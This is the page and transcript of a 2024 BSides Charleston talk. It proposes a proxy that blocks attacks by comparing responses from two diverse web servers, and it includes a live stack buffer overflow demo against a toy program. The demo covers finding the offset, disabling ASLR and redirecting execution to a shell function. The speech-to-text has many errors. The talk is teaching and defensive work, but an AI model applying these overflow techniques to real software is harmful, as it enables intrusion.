← All talks

Creating a Secure Web Server from 2 Vulnerable Web Servers

BSides Charleston · 202446:03171 viewsPublished 2024-11Watch on YouTube ↗
Speakers
Tags
CategoryTechnical
StyleDemo
About this talk
"A Shell? In the HTTP server response factory? Ok I guess we doin' shells now:" Creating a Secure Web Server from 2 Vulnerable Web Servers (Live Exploit Demos!) by Parker Garrison Join cybersecurity expert Parker Garrison as he dives into innovative ways to secure a web server by combining two vulnerable servers to create a resilient defense system. This live demonstration explores exploit mitigation techniques, particularly through a consensus-based defense approach that leverages the strengths of each server to mitigate vulnerabilities and prevent data loss. Key Topics Covered: • Consensus-Based Defense: Combining two distinct web servers to block attacks when only one remains secure. • Exploit Mitigation Techniques: How consensus-based defenses reduce risks of data loss, buffer overflows, and other common exploits. • Memory Safety and Buffer Overflow Prevention: Using redundancy in servers to prevent successful exploitation. • Historical and High-Profile Vulnerabilities: Examples of defenses against attacks like Code Red, Heartbleed, and Spectre using diversified server architectures. Garrison shares insights into both the theoretical and practical aspects of this novel security approach. With live exploit demos and in-depth explanations, this talk is ideal for those in penetration testing, threat intelligence, and cyber defense.
Show transcript [en]

If I could have your attention, Hey, good morning, guys. We're gonna move into with Parker here web service. So we're live next board. So get a round of applause for Parker here, we're all right, thank you, everyone. So my title of my talk is a shell in the HTTP server response factory. Okay, I guess we do in shells. Now we're going to be creating a secure web server from two different vulnerable web servers. And if you don't know what meme I'm referencing, you will see it in a few minutes. Disclaimer, the views it spreads by the speaker in this presentation are the same as the official views and positions my employer. Wait, what isn't that usually supposed to say

something else well, as the founder of the company iguana cyber, I am authorized to speak on behalf of my company. We are still very early pre seed about myself, so I've spent some time working in both the public and the private sector. I helped contribute to the miter defend framework and C, W, E, when I worked there and I worked for a major defense contractor. I also have experience as an independent security consultant, helping mostly with penetration testing. And then I tried to figure out, well, how can I stop the stuff that I'm doing? And so this consensus based defense technique is something that I came up with. All right, let's go ahead and so many people face

a problem of trying to determine what program you'd use in a certain scenario. Different programs are going to have different vulnerabilities introduced at different times. So like, here we have program one. It's got a vulnerability from 2023 or so. It lasts like a year. We don't know the severity of it. There's another program. And then, Oh also, this had a cloud strike driver flaw that prevented it from working rhinos with a very certain security company that had that same issue earlier this year that grounded hundreds of flights across the country. And then this other program has a vulnerability a longer time. Well, why not all of these? Wait all the vulnerabilities? Nope. It turns out that we can be secure if at

least one of these programs at each given point in time is secure. So like here, we see that there's very few times we're using all the programs would have been secure, indicated by light green on the left here. But if one of the programs is vulnerable and the others are secure, we're going to show an example of how you can maintain security in your environment. So a quick overview of how this works for a web server, normal web server, the guy on the assembly line is just like shell, the HTTP response factory, I guess we do in shells. Now, if the intrusion detection system on the host or on the network is not able to detect that what was going on

was an exploit, then you're basically stuck once you get to the output and it leaves your environment years no further filtering that you can do there. The attacker is going to get your private data. But the alternative here is to not listen to that guy and see if we can tell the difference between two different web servers that should be properly responding with the exact same web page content. Now exact same is caveated by a few different things that we had to filter out for for example, like, obviously the server header in HTTP is going to be different. There's also some other aspects of a web page, like cookies was particularly challenging, and many JavaScript frameworks can, for example, return dictionaries

in any order. So that all has to be normalized. But then, after I go through that normalization, are these two exactly equal or not? So now you can tell if you got one vulnerable one, not vulnerable web server. Compare these as they're coming off the assembly line. Matches up. Match it up. Doesn't match up. We don't need to know what a shell looks like. We just know that it doesn't match up with what's going on right now. We don't rely on any historical baseline. We rely on the actual request on an actual other web server that you set up in your environment.

So measure twice, cut once. If just one piece of software is secure against a given net split, we're able to neutralize these attacks and also prevent data loss. Data Loss Prevention is very tough field to do because any number of ways of encrypting or. Coding the data, the data can get out. A lot of data loss prevention solutions that I've seen are simply fooled by just base 64 encoding the data, which, as you know, they should at least be checking for that, right? So the example here, you send a malicious request, one of them returns the response that the attacker was looking for. The other could be a firewall on the host, or whatever it's using. It's not

using the limit, so this means absolutely nothing to it. In the middle, our proxy will be able to just send back access to nine

so some examples, you have a mission critical binary. Who knows why you're still running something from 2008 and haven't updated it? But happens in many organizations, of course, they're not producing any updates for this, but maybe you still have executables for at least Windows and Windows Server and maybe Linux also, as we're going to see later, if we do the live demo of buffer overflow. So memory layout across operating systems is extremely different, so our buffer overflow techniques are not going to work, and we have to simultaneously exploit two different platforms, or you also know that you have some piece of software in your tech stack that's bound to have a vulnerability, and you want to

diversify the risks for that. So now I'm going to step through and see how some of the most high profile attacks that we might have heard of recently are addressed by a consensus based defense. So this one's a bit of an older one, Code Red. It's a buffer overflow of vulnerability in the IAS web server. But if we were to also add a Linux based web server, as we had earlier in that back end, the responses that we're sending would not match up. This was a buffer overflow exploit. And so although it may take the Windows web server offline, we'll be able to quickly restore it and put another server in place, as I'll show in the third example here memory leak attacks. You

may also remember about Heartbleed, that was a buffer read overflow open SSL was a library that's widely used on when it's based systems, not widely used as much on Windows based systems. So instead on Windows, the SSL capabilities are built into the operating system. Example, user make once these six letters potato, the server responds with potato, another response that should be properly conforming. It requests bird, sends back bird. But now, essentially, what this vulnerability was user made requests, 500 letters hat, obviously, person should not be reading the server's administer key has changed. This Isabelle wants pages about snakes, but not too long. So now you're able to read information that's private to the server or belongs to other users. All right. So in

addition using, as I mentioned on our first item about code red, if you brick the web server, you're able to stand another one up in its place. So this looks like the logo of a certain security company that rhymes with Cloud strike that earlier this year, took down millions of PCs in the US alone. Instead of we stopped breaches, they ended up stopping everything. So yeah, I guess they stopped breaches as well.

So we have a cold spare running environment. It's usually not used for anything, but can be booted up and run as needed. Let's see if server B gets taken over by cloud strike. We can't boot it after this goes blue screen as soon as we try to do anything in it outside of safe mode. So we can just take that server off the network. However, as much time we need to respond to it and then connect to another cold spare and then there's our two subordinate web servers, we still have essentially the same security guarantees as before. Server B went down. All right, another vulnerability that came about last year in Etsy utils, basically many open source

software packages had a complete reliance on this one component, a back drawer, was inserted deliberately over the course of several years by a GitHub user claiming to be the name Jia Tan, who had no affiliation with other open source software projects or really any information about himself on the internet. However, he was able to convince the maintainers. Were overworked into allowing him to get on the software project as an administrator, and then he started making several questionable changes, including inserting an absolute back door that allowed anyone with his SSH key access to millions of devices across the internet.

So on Windows, though, instead of the zip utilities being used by that library, Windows uses LC 32 dot DLL, so it was not vulnerable. And additionally, if you're behind our proxy, or really any good firewall, you're not going to allow port 22 directly to your web servers from an external environment, you're going to restrict, uh, where that can be at, sets, possibly only internally, and then nets. Let's talk about specular execution. So is specter still an ongoing problem? I mean, wasn't that so 2018 is it still something this year? Yes, this past month, also yes, and this past week, also yes. So speculative execution at splits, though, however, are extremely targeted to the specific platform the processor

on which you're executing the exploit, for example, Intel AMD or Qualcomm, and even more so, to the CPU architecture, where instructions on one CPU would mean complete garbage on another CPU. So therefore using two different CPUs that are using caching the information in completely different ways, and use completely different instructions results in at least one back end being unsuccessful. So of course, any responses won't match up, and the attacker will not get their sensitive information. So I've mentioned using two different back ends, but really, what's the historical likelihood of two being vulnerable at the same time? I found using Google's Project Zero, I did some research and found that unpatched vulnerabilities that allowed remote code execution

into web servers, at least, have never occurred simultaneously or within a two month window. So if you're able to diversify your other components as well and use a reasonable patching cycle of at least every one or two months, then, based on this data, you're likely to remain secure even if there is a simultaneous exploit, as I mentioned, like for example, with the specter, you're going to have a hard time matching it up, and we're going to see exactly how a memory vulnerability is sorted with this later in part two of our presentation. So today's practice simple request response. Instead, what we're moving to here is to send the requests to two separate web servers, then normalize and

compare the responses if they don't match up. The point here is that we can send a high fidelity alert to the same if something was up normally, these responses should always be the same, so that we know that an successful exploit was attempted against us, rather than something general that might not apply to our environment, and this example of it working with WordPress. So if we're able to block these requests that do not that were obviously an attack, then how effective is it? Well, a 2023 report by Census found that even blocking simple fingerprints of scans, they were able to block 93% of follow on attacks. Number of targeted attacks goes down to 7% of what

it otherwise would have been. And additionally, a report from hacker factor last year showed that within the past 10 years, by employing more advanced fingerprint blocking, they were able to reduce themselves to only dealing with one targeted attack, and significantly reduce the amount of alerts that their small SOC was able to look at. So in the early days of security, the 1990s and 2000s we were focused on prevention. Now with things such as zero trust, we're focusing more on detection and doing more threat hunting as well. This takes us another level enable to be able to do some successful prevention. The attacks may still technically occur on the back end to completion, but the data is not going to get out to the

attacker. Every attack has to occur in at least three phases, the input of the data, processing of data, and the output of the data. So if all of the other defenses fail, this will stop the attack when it's trying to output the data in the middle of the proxy, right here. Sure. All right, so now we get to do some hands on exploit development, and I'll get into that demonstration I was talking about. I'm going to pull up a slido link for us so that we can participate, along with the questions right here,

as well as switch my Presenter View. So just give it about 60 seconds Right Here I'm

all right, so Go to slido.com

and we're going To enter the Code overflow you.

It is overflow, O, V, E, R, F, l, O, W, and I will put up a sample question here. I

All right, so let's get started with examining exactly how many buffer overflow exploits work in a program to understand that, we're first going to have to look at what memory is read or written to by a buffer overflow exploit. All modern operating systems use a concept called a stack, so let's look at how that works First, as well as a layout of memory inside the stack.

Modern programs consist of many different memory segments. These segments include the code data that's initialized prior to the program being run, and space that's saved for dynamically allocated data once the program has been run both of a known size or an unknown size. I've included a program if you want to copy my slides, use, get clone, HTTPS, github.com/

Parker, Garrison, slash, overflow. So this segment Memory program, let's take a look at it. It's just going to print out what some segment addresses are on when it's as I mentioned here, this where the code is stored. This is actually going to be a pointer to the main function here. It's called the Tet segment for historical reasons. Then we can look at the initialized and uninitialized data segments here. That's data, and that stands for block started by symbol, and then the heap and the stack. The stack is where we're going to be focusing our efforts on in the exploits, because some security relevant information is on the stack, as well as variables that we can

control. So if we're not restricted from writing to the bounds of those variables on the stack, then we can overwrite that security relevant information, which is called the saved instruction pointer. So let's take a look at some of these addresses. Let's GCC segment memory, dot, C output, segment mem. Now let's run segment mem, alright, so that works here. We get an address in the stack, as we can see, that's near at the high end of memory, and the way our compiler worked, everything else was shoved into the lower memory. And so now let's enable ASLR

on when is this can be done pretty much without a restart

and run our program again.

Made a typo here. Want to pipe that so now we see the address is different. This is a safeguard that will randomize the start of the stack so that we can't simply insert static values with that are known in advance. We have to execute some sort of memory leak in order to get the addresses that we want.

So this will all make more sense as we're going through the exploits. So here is that virtual memory layout from the output of our program just taken in and put into here we have that Tet segment data, segment initialize and initialize data the heap, which we're not going to be touching today, and then memory that can be shared between the stack and the heap as needed. Kernel memory is above all of this, and we're also not going to be interacting directly with the kernel today. We can do our exploits just with user space. And you can see what permissions are typically applied to each of these memory segments, whether they're readable, writeable, executable. The only one that should be executable is the test segment,

though, also if you know the addresses of something in the stack, and you can make that executable, then you could write your color in the stack and execute it. That's also more advanced, and we won't be getting to that today. We will just be using address that we know is in the chat segment. All right, so we talked about ASLR. So now let's go and see why do we use a stack? Why is this common among basically every platform today? So in the very early days of programming languages, like in the 1960s or so, space for their variables had to be allocated statically before the program was run. When you're dealing with a maximum of 64k of memory, that kind of

makes sense. But as we wanted to make programs be able to be more dynamic, and we could include large libraries without saving place for all the variables for the functions. We're never going to run. A common idea of a stack came about in which when we called another function, it reserves place for the variables and then keep a pointer back to the function stack frames under it, so that when we finish that function, we know where it's at we would have to go back to and can continue executing a stack frame also allows use of recursion. We can call the same function multiple times without having to rely on the same variable spaces, and this is common to basically every

programming language today. So when we call a function, there's some important data that saved the stack I mentioned where we go back to once the program is done. So now we're going to look at the actual assembly language to see how that takes place the caller. Is responsible for stuff before the new function, then the callee, the function that's called, has to do some setup, and then the callee has to actually determine where to go back to in the caller. And then the caller just continues from there. Doesn't have to do anything else. So in 32 bit assembly language, EIP is the register that stores the instruction pointer. It can't be changed directly, though, when

you call a function, the instruction pointer will point to the start of that function. And I also mentioned the stack pointer and the base pointer. So we saw, if we go back like to hear, the stack is growing downward. Higher memory addresses are at the top of this diagram, and lower memory addresses where we saw the test segment was and such are at the bottom of the diagram. So as we create a stack frame for a function that we call it's going to have a lower memory address, the stack grows towards lower memory addresses and it shrinks towards higher memory addresses. This can sound confusing at first, but some of this was just done for historical reasons, and

the reason that the stack grows towards lower memory addresses, but most buffers are written towards higher memory addresses, is why we can overwrite the data of previous stack frames and data that's important to our stack frame. If the buffer were to say, go in the other direction, then we would only be able to overwrite variables in our local function, and may not be able to have as much of an impact. But because of this decision, this was what has made stack based buffer overflow exploit so common? And now let's take a look at just three assembly instructions, push, pop and call. So pushing a register to the stack, it moves to where the stack frame is at. That's de

referencing the stack address, and I mean that's referencing the stack address, puts that onto the stack and then subtracts to make more room for the stack. Remember, as the stack grows, it grows towards lower memory addresses. So the edge of our stack is going down towards lower memory addresses, because we made more room if we can also pop something into a certain register, so that will basically take it off the stack, move it back up. Very early assembly languages for early computers, there weren't many other instructions to reference somewhere in the middle of the stack. And so these instructions were used extensively nowadays. You'll see them mostly just for setting up and tearing down the start and end of a function, and

then finally, to call a function name. This is not an actual assembly instruction, but essentially what it does is it pushes the instruction pointer to the stack and then jumps to the start of that function name. So when we push the instruction pointer to the stack, of course, we are, say, writing it here, decreasing the address of our stack so the stack can grow downwards. All right, so now I want to see how well I've been describing this stuff so far. Let's take a look at the slido poll. If you pulled it up in typical program execution, what is the value of the ESP register, the stack pointer that is the edge of the stack compared to EBP, the base of the

current function stack frame is ESP less than or equal to ebp greater than or equal to or does it vary depending on the circumstances? All right, I see we've got a lot of responses in already. There was a mint bag before I saw one response under each but now most people are picking the correct answer. We've gotten 70% for less than or equal to the stack does grow downwards.

So now let's take a look at what happens in the called function itself. It will push the base pointer onto the stack, so then stack grows downwards. Then it will set the edge of the stack to where the base pointer is. And then it will make room for the current variable, so the ESP value will be lower than the EP value by n, whatever amount of space for society in advance it needs for the variables, then at the end, it just does the same thing in opposite, though, if the value that it's overwriting at the base of the stack is not legitimate save base pointer, or if the value that was saved right on top. That was not

legitimate instruction pointer, then we can take control of the program. So in the sample here and the stack, I've reversed the direction the diagram from before, lower memory addresses are going to be at the top, and higher addresses are going to be at the bottom. So let's see that works out normally. Now I buffer overflow and variables, one that gets overwritten, and then the control goes to somewhere that doesn't exist because a ask a value A corresponds to 41414141, which is not a valid memory address. So we could either determine exactly what the offset is, or we can just start shoving in data and see that's unique per each four byte value and see what exactly ends up in

the instruction pointer and the base pointer to see where we can take control of it. So our exploit writing procedure is going to look something like this. We find an input opportunity to write the data. We have to identify what exploit mitigations are in place. And for this talk, we're going to go very quick. So we're not going to implement many exploit mitigations, then see if we can get the program to crash. So let's take a look at our program that we're going to try to exploit instead of having a full fledged web server. Also as well, I took out well over 90% of the proxy logic that was dedicated to HTTP. So we can just do this quick demo with an

example program I have right here. So let's compile our wisdom program.

We can see already there's some vulnerable functions in here. Gets that is, in fact, one that we're going to use. So let's go in wisdom. Dot out Main Menu, log in, log out, status, receive wisdom. Add wisdom. So add wisdom sounds like a place to enter data. Login does too. Let's see what receive wisdom does First, don't drink coffee patch for PM, unless you want to stay away until the AM. A great shell to use has been bash. You can get a power up in some video games by entering the Konami code. Let's try to add wisdom now. Let's do test one. Test two. And let's receive that back. Okay, so print it back to

the screen. That's two right there. You don't know what happened with the string test one. Now let's try adding some longer data. Just hold down the yay key repeatedly and see if we have overflowed that buffer, segmentation fault. Segmentation fault means that it's tried to access memory that really did not exist. Now let's try to figure out exactly how far our offset is into the exploit, so let's use GDP so that it will stop the program and give us what's going wrong.

And let's run now. I have a tool here to generate characters that will that are different every four bytes in the overflow directory. If you phone that from GitHub, it's called Pat Gen pattern generate. So let's just generate about 200 characters should be enough, based on the amount of A's we did. So we're going to add wisdom. Let's just put that in both fields, all right. So program, receive, signal, SIG, imitation, fault. This is promising right here, because that looks looks like ASCII data.

So now let's see what the offset in the pattern was, all right, so we get two different values here. What's the difference between little and big endian? Well, obviously we didn't generate that many characters. Little Endian and Big Endian are two different ways of storing values in memory. So for historical reasons, Intel decided it was easier to store certain values in memory backwards, so with the most significant byte being the last, whereas other processors were using the most significant byte first, really, as long as you're reading in a consistent way, both of them work though this way that seems like us. To be backwards is the one that is more common in processors today. So the name Little versus big

endian came from the book girl gull versus travels. It was basically a pointless dispute between two different factions, where you crack the egg on the bigger bigger end or the little end. Both of them work, but obviously you can't do both at the same time. So we see that we need to pad with 152 bytes of filler before we get to what we want to overwrite our value with here. So if we were to look at the list of functions in this program, see what could we just use in here to overwrite with? And let's just do continue pulling up library functions. So let's see which function might be valuable to us. Frame dummy, right? Secret, oh, shell. Well, maybe if this is in the program

and we just call a shell immediately, I don't know, let's try it. So I've included a script here also run escape that will escape the character, so we don't have to write out separate scripts each time. So like I will do run escape.sh, and then I'll do wisdom dot out. I'm in the wrong directory, I guess, move up. So overflow, slash, run, escape.sh, wisdom, dot out. So I'm going to need to first generate 152 A's and then put this value packed in Little Endian, which I said earlier, just means reversing the bytes. So let's do let's get ourselves 152 bytes of filler. Start making our exploit here, doing this on the fly without even writing a separate script for

it. So to use a library like poem tools, then you can pack it into four bytes without having to do this reversing manually. I

now let's enter some wisdom key. Alright, so what happened here? Called the shell function, or did we see

shells may not give a pound prompt back if they work broken pipe. All right. If we were able to do this correctly, we would see that we are getting a shell here. So let's try one more thing, just writing in its own program to print this out. So

this live demo has worked two out of three times before today. So today might be two out of four. We'll see if we can make it three out of four. So A's equals a times 152, then instruction pointer to overwrite equals. Shell over here, 9d, 1240, I'm going to navigate the menu, we're going to print five, and then we're going to to select adding wisdom, S Voice, A's, plus the IP, and then we're going to print the slight for both the title and the value of the wisdom. So let's see if we can pipe this in properly, and then

dots do Python at split one.py and see if it's printing out exactly what we want. Put it into a head stump. And yet, sure looks like it, though, there is this shell over here. There's an extra c2 character I'm

alright, so let's go and dump this into the. The Wisdom binary. So it did something there. It didn't crash the program. All right, let's try running this in gdb and see what happens. So we'll do our run with escape wisdom. Dot out. So let's quit out of here. We can attach CDB to an existing process,

continue it and you see if we can do anything over here, then we can attach the right process. So point out and

so now we have no other processes running over here. We should find the right one. And now, if we do something here, we see we're hooked to the debugger. Can't do anything continue. Now, let's enter a title. Let's Enter our at split over here you

and since let's just run this as Being escaped, so we don't escape the values twice and

let's continue over here.

All right, segmentation fault, so it doesn't like, oh, that this value, 4012, 9d, so let's examine what's there. Is it as an instruction? Can't add system memory, I probably cost. ASLR is still on here, so it's going to what would a different address. So yeah, ASLR caused it to kick to that different address. So we can see one of our exploits was causing this problem. So it looks like got, like, three minutes or so to wrap up. Let's see if we can remember to disable ASLR before The demo. I

and let's run this

Unknown: program again and

Parker Garrison: attached to it with gdb, and continue. Now, let's try our exploit once again, detaching after V fork from child process once so if something happened here with our red maybe the shell creates a child process. Wow, we have a shell.

Alright, so now I'm going to just show how, if you have a consensus based defense in place, that this would not work, the other side would crash, and you would have essentially a as you'd be accessing memory that didn't exist in the other program, as I was trying to do when ASLR was on in the system, even if it's on one but not on the other, and it still won't work. So in this window, we're going to start our binary to run wisdom forever,

and then here we're going to run our proxy forever and

then see if we can connect to it. And.

All right, looks like we're having some time errors. All right, well, I'm looks like I am out of time here. But the point is, if we were able to connect to both systems within time that memory addresses would not line up if we were to attempt the memory leak and or if we were to attempt to buffer overflow like this, so even though there was a shell in one system, the response would not get passed through the proxy. So back to the end point of the attacker. All right, I'll leave my contact information up here if you're interested in talking about beta testing this, that or we are also looking for potential seed investors as well. So I am Parker at Parker garrison.com,

and thank you all. Okay.